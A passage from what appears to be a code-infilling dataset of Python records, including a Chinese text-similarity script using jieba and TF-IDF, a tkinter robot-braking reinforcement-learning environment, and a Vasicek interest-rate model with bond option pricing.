DadmmC.tol = tol\n\n ######\n Final = DadmmC.ktensor\n #Rec = Final.totensor().data * omega + X.data * (1 - omega)\n full = Final.totensor()\n Rec = full\n ######\n\n elif function_name == '0':\n print 'Successfully Exit'\n return None, None, None, None\n else:\n raise ValueError('No Such Method')\n\n else:\n raise TypeError('No Such Method')\n\n # Output Result\n # [nv, nd] = subs.shape\n if function_name == 1 or function_name == 2:\n newsubs = full.tosptensor().subs\n tempvals = full.tosptensor().vals\n newfilename = file_name[:-4] + '_Decomposite' + file_name[-4:]\n #print \"\\n\" + \"The original Tensor is: \"\n #print X1\n print \"\\n\" + \"The Decomposed Result is: \"\n print Final\n else:\n newsubs = Rec.tosptensor().subs\n tempvals = Rec.tosptensor().vals\n newfilename = file_name[:-4] + '_Recover' + file_name[-4:]\n #print \"\\n\" + \"The original Tensor is: \"\n #print Ori\n print \"\\n\" + \"The Recovered Tensor is: \"\n print Rec.data\n\n # Return result\n return Ori, full, Final, Rec\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding:utf-8
import jieba
import os
import sys
import math
reload(sys)
sys.setdefaultencoding('utf-8')
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
#import csv
#import pandas
#import numpy
sentence1 = sys.argv[1]
sentence2 = sys.argv[2]
#sentence1 = '他很喜欢玩游戏,也喜欢看小说'
#sentence2 = '他喜欢玩游戏,最喜欢看小说'
Divlist1 = jieba.lcut(sentence1, cut_all=True)
Divlist2 = jieba.lcut(sentence2, cut_all=True)
Sen = [" ".join(Divlist1), " ".join(Divlist2)]
vectorizer=CountVectorizer()#该类会将文本中的词语转换为词频矩阵
transformer=TfidfTransformer()#该类会统计每个词语的tf-idf权值
TFIDF_value=vectorizer.fit_transform(Sen)
word=vectorizer.get_feature_names()#获取词袋模型中的所有词语
matrix_value = TFIDF_value.toarray()
vex1 = list(matrix_value[0])
vex2 = list(matrix_value[1])
def cos_dist(a, b):
if len(a) != len(b):
return None
part_up = 0.0
a_sq = 0.0
b_sq = 0.0
for a1, b1 in zip(a,b):
part_up += a1*b1
a_sq += a1**2
b_sq += b1**2
part_down = math.sqrt(a_sq*b_sq)
if part_down == 0.0:
return None
else:
return part_up / part_down
Similarity_Cos = cos_dist(vex1, vex2) #余弦
sumdot = 0.0
for iii in range(len(vex1)):
sumdot += vex1[iii] * vex2[iii]
Similarity_dot = sumdot #内积
sum12 = 0.0
sum1 = 0.0
sum2 = 0.0
for index in range(len(vex1)):
sum12 += vex1[index] *vex2[index]
sum1 += vex1[index] ** 2
sum2 += vex2[index] ** 2
Similarity_Jaccard = sum12/(sum1 + sum2 - sum12) #jaccard相似度
res=open("SIMresult.txt", 'w')
res.write('余弦: '+str(Similarity_Cos)+'\n内积: '+str(sumdot)+'\nJaccard系数: '+str(Similarity_Jaccard))
res.close()
print('余弦: '+str(Similarity_Cos)+' 内积: '+str(sumdot)+' Jaccard系数: '+str(Similarity_Jaccard))
#print(' ')
#print(Similarity_dot)
#print(' ')
#print(Similarity_Jaccard)
|
normal
|
{
"blob_id": "1a7e83fe9528b177246d6374ddaf2a76a0046e83",
"index": 200,
"step-1": "<mask token>\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\n<mask token>\n",
"step-2": "<mask token>\nreload(sys)\nsys.setdefaultencoding('utf-8')\n<mask token>\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\n<mask token>\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\n<mask token>\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\n<mask token>\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-3": "<mask token>\nreload(sys)\nsys.setdefaultencoding('utf-8')\n<mask token>\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\nSen = [' '.join(Divlist1), ' '.join(Divlist2)]\nvectorizer = CountVectorizer()\ntransformer = TfidfTransformer()\nTFIDF_value = vectorizer.fit_transform(Sen)\nword = vectorizer.get_feature_names()\nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\nSimilarity_Cos = cos_dist(vex1, vex2)\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\nSimilarity_Jaccard = sum12 / (sum1 + sum2 - sum12)\nres = open('SIMresult.txt', 'w')\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-4": "import jieba\nimport os\nimport sys\nimport math\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom sklearn import feature_extraction\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\nSen = [' '.join(Divlist1), ' '.join(Divlist2)]\nvectorizer = CountVectorizer()\ntransformer = TfidfTransformer()\nTFIDF_value = vectorizer.fit_transform(Sen)\nword = vectorizer.get_feature_names()\nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\nSimilarity_Cos = cos_dist(vex1, vex2)\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\nSimilarity_Jaccard = sum12 / (sum1 + sum2 - sum12)\nres = open('SIMresult.txt', 'w')\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-5": "# coding:utf-8 \nimport jieba\nimport os \nimport sys\nimport math\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom sklearn import feature_extraction \nfrom sklearn.feature_extraction.text import TfidfTransformer \nfrom sklearn.feature_extraction.text import CountVectorizer\n#import csv\n#import pandas\n#import numpy\n\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\n#sentence1 = '他很喜欢玩游戏,也喜欢看小说'\n#sentence2 = '他喜欢玩游戏,最喜欢看小说'\n\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\n\nSen = [\" \".join(Divlist1), \" \".join(Divlist2)]\n\nvectorizer=CountVectorizer()#该类会将文本中的词语转换为词频矩阵\ntransformer=TfidfTransformer()#该类会统计每个词语的tf-idf权值 \n\nTFIDF_value=vectorizer.fit_transform(Sen)\nword=vectorizer.get_feature_names()#获取词袋模型中的所有词语 \nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a,b):\n part_up += a1*b1\n a_sq += a1**2\n b_sq += b1**2\n part_down = math.sqrt(a_sq*b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\nSimilarity_Cos = cos_dist(vex1, vex2) #余弦\n\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot #内积\n\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] *vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\n\nSimilarity_Jaccard = sum12/(sum1 + sum2 - sum12) #jaccard相似度\n\nres=open(\"SIMresult.txt\", 'w')\nres.write('余弦: '+str(Similarity_Cos)+'\\n内积: '+str(sumdot)+'\\nJaccard系数: '+str(Similarity_Jaccard))\nres.close()\nprint('余弦: '+str(Similarity_Cos)+' 内积: '+str(sumdot)+' Jaccard系数: '+str(Similarity_Jaccard))\n#print(' ')\n#print(Similarity_dot)\n#print(' ')\n#print(Similarity_Jaccard)\n\n \n\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
import tkinter as tk
import time
HEIGHT = 100
WIDTH = 800
ROBOT_START_X = 700
ROBOT_START_Y = 50
SLEEP_TIME = 0.00001
SLEEP_TIME_RESET = 0.2
class Environment(tk.Tk, object):
def __init__(self):
super(Environment, self).__init__()
self.action_space = ['g', 'b'] # go, break
self.num_actions = len(self.action_space)
self.title('Environment')
self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))
self._build_environment()
def _build_environment(self):
self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)
# create obstacle
obstacle_center = np.array([20, 50])
self.obstacle = self.canvas.create_rectangle(
obstacle_center[0] - 10, obstacle_center[1] - 40,
obstacle_center[0] + 10, obstacle_center[1] + 40,
fill='black'
)
# create robot
robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])
self.robot = self.canvas.create_polygon([
robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,
robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,
robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,
robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10
],
fill='blue'
)
# pack
self.canvas.pack()
def stop_robot(self):
# change outline to show the robot slows down
self.canvas.itemconfig(self.robot, outline='red')
# slow down robot
for i in range(50):
self.canvas.move(self.robot, -1, 0)
time.sleep(SLEEP_TIME * 10 * i)
self.render()
# change outline back again
self.canvas.itemconfig(self.robot, outline='')
self.render()
time.sleep(0.2)
def perform_action(self, action):
stopped = False
done = False
reward = 0
if action == 0: # drive
self.canvas.move(self.robot, -1, 0)
elif action == 1: # break
# if you want to speed up the process comment the next line in and the function stop_robot out
#self.canvas.move(self.robot, -50, 0) # move further because of stop distance
self.stop_robot()
stopped = True
nextState = self.canvas.coords(self.robot)
obstCoords = self.canvas.coords(self.obstacle)
dist = nextState[0] - obstCoords[2]
if stopped:
if (dist >= 15 and dist <= 40): # if enough space to obstacle
reward = 1
done = True
elif dist < 15: # if too close to obstacle
reward = -1
done = True
else: # if too far away to obstacle
reward = -1
done = False
elif nextState[0] <= obstCoords[2]: # if robot hits obstacle
reward = -1
done = True
return dist, reward, done
def reset(self):
self.update()
time.sleep(SLEEP_TIME_RESET)
self.canvas.delete(self.robot)
# create robot
robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])
self.robot = self.canvas.create_polygon([
robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,
robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,
robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,
robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10
],
fill='blue'
)
robotCoords = self.canvas.coords(self.robot)
obstCoords = self.canvas.coords(self.obstacle)
dist = robotCoords[0] - obstCoords[2]
return dist
def render(self):
time.sleep(SLEEP_TIME)
self.update()
|
normal
|
{
"blob_id": "ee272fe1a023d85d818a8532055dcb5dbcb6a707",
"index": 4799,
"step-1": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n <mask token>\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()\n",
"step-4": "<mask token>\nHEIGHT = 100\nWIDTH = 800\nROBOT_START_X = 700\nROBOT_START_Y = 50\nSLEEP_TIME = 1e-05\nSLEEP_TIME_RESET = 0.2\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n\n def stop_robot(self):\n self.canvas.itemconfig(self.robot, outline='red')\n for i in range(50):\n self.canvas.move(self.robot, -1, 0)\n time.sleep(SLEEP_TIME * 10 * i)\n self.render()\n self.canvas.itemconfig(self.robot, outline='')\n self.render()\n time.sleep(0.2)\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()\n",
"step-5": "import numpy as np\nimport tkinter as tk\nimport time\n\nHEIGHT = 100\nWIDTH = 800\nROBOT_START_X = 700\nROBOT_START_Y = 50\nSLEEP_TIME = 0.00001\nSLEEP_TIME_RESET = 0.2\n\nclass Environment(tk.Tk, object):\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b'] # go, break\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n\n # create obstacle\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(\n obstacle_center[0] - 10, obstacle_center[1] - 40,\n obstacle_center[0] + 10, obstacle_center[1] + 40,\n fill='black'\n )\n\n # create robot\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([\n robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,\n robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,\n robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,\n robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10\n ], \n fill='blue'\n )\n\n # pack\n self.canvas.pack()\n\n def stop_robot(self):\n # change outline to show the robot slows down\n self.canvas.itemconfig(self.robot, outline='red')\n \n # slow down robot\n for i in range(50):\n self.canvas.move(self.robot, -1, 0)\n time.sleep(SLEEP_TIME * 10 * i)\n self.render()\n\n # change outline back again\n self.canvas.itemconfig(self.robot, outline='')\n self.render()\n time.sleep(0.2)\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n\n if action == 0: # drive\n self.canvas.move(self.robot, -1, 0)\n elif action == 1: # break\n # if you want to speed up the process comment the next line in and the function stop_robot out\n #self.canvas.move(self.robot, -50, 0) # move further because of stop distance\n self.stop_robot()\n stopped = True\n\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n\n if stopped:\n if (dist >= 15 and dist <= 40): # if enough space to obstacle\n reward = 1\n done = True\n elif dist < 15: # if too close to obstacle\n reward = -1\n done = True\n else: # if too far away to obstacle\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]: # if robot hits obstacle\n reward = -1\n done = True\n\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n\n # create robot\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([\n robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,\n robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,\n robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,\n robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10\n ], \n fill='blue'\n )\n\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
from functions2 import *
import numpy as np
#from functions import TermStructure,load_data
import numpy as np
import math
from scipy import optimize
import pylab as pl
from IPython import display as dp
class Vasicek():
def __init__(self,rs,vol):
self.t = rs.columns
self.ps= rs[-1:]
self.sigma = vol
def get_TheoreticalP(self,x=0):
sigma = self.sigma
try:
_ = x.shape
except:
x = self.t
a = self.a
b = self.b
B = (1-np.exp(-a*x))/a
A = np.exp(((B-x)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))
self.B=B
self.A=A
self.sim_p = A*np.exp(-B*x)
self.r = -1*np.log(self.sim_p)/x
return self.r
def loss(self,x):
self.a = x[0]
self.b = x[1]
self.sim_rs = apply(self.get_TheoreticalP,self.ps)
loss = np.array(self.ps.as_matrix())-np.array(self.sim_rs)
loss = 10000*np.sum(loss**2)
return loss
def solve(self,x0=np.random.rand(2)):
self.opt_results = optimize.fmin(self.loss,x0=x0)#,tol=1e-10,method='Nelder-Mead',options={'maxiter':1800})
self.a = self.opt_results[0]
self.b = self.opt_results[1]
print(self.opt_results)
def get_price_rate(self,T,r):
sigma = list(self.sigma)[T]
T = self.t[T]
a = self.a
b = self.b
B = (1-np.exp(-a*T))/a
A = np.exp(((B-T)*(a**2*b-(sigma**2)/2))/a**2)-(sigma**2*B**2)/(4*a)
p = A*np.exp(-B*r)
r = -1*np.log(p)/T
return p,r
def option_pricing(V,r,t,T,X):
#print('Expiration: {}'.format(t))
#print('Maturity: {}'.format(T))
time_dict = dict(zip(V.t,np.arange(len(V.t))))
r = r[-1:][t].item()
P = V.get_price_rate(time_dict[T],r)
p = V.get_price_rate(time_dict[t],r)
sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))
d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap
c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)
return c
|
normal
|
{
"blob_id": "b6470ffda9040223951a99abc600ce1e99fe146b",
"index": 7902,
"step-1": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n <mask token>\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n <mask token>\n <mask token>\n\n\n<mask token>\n",
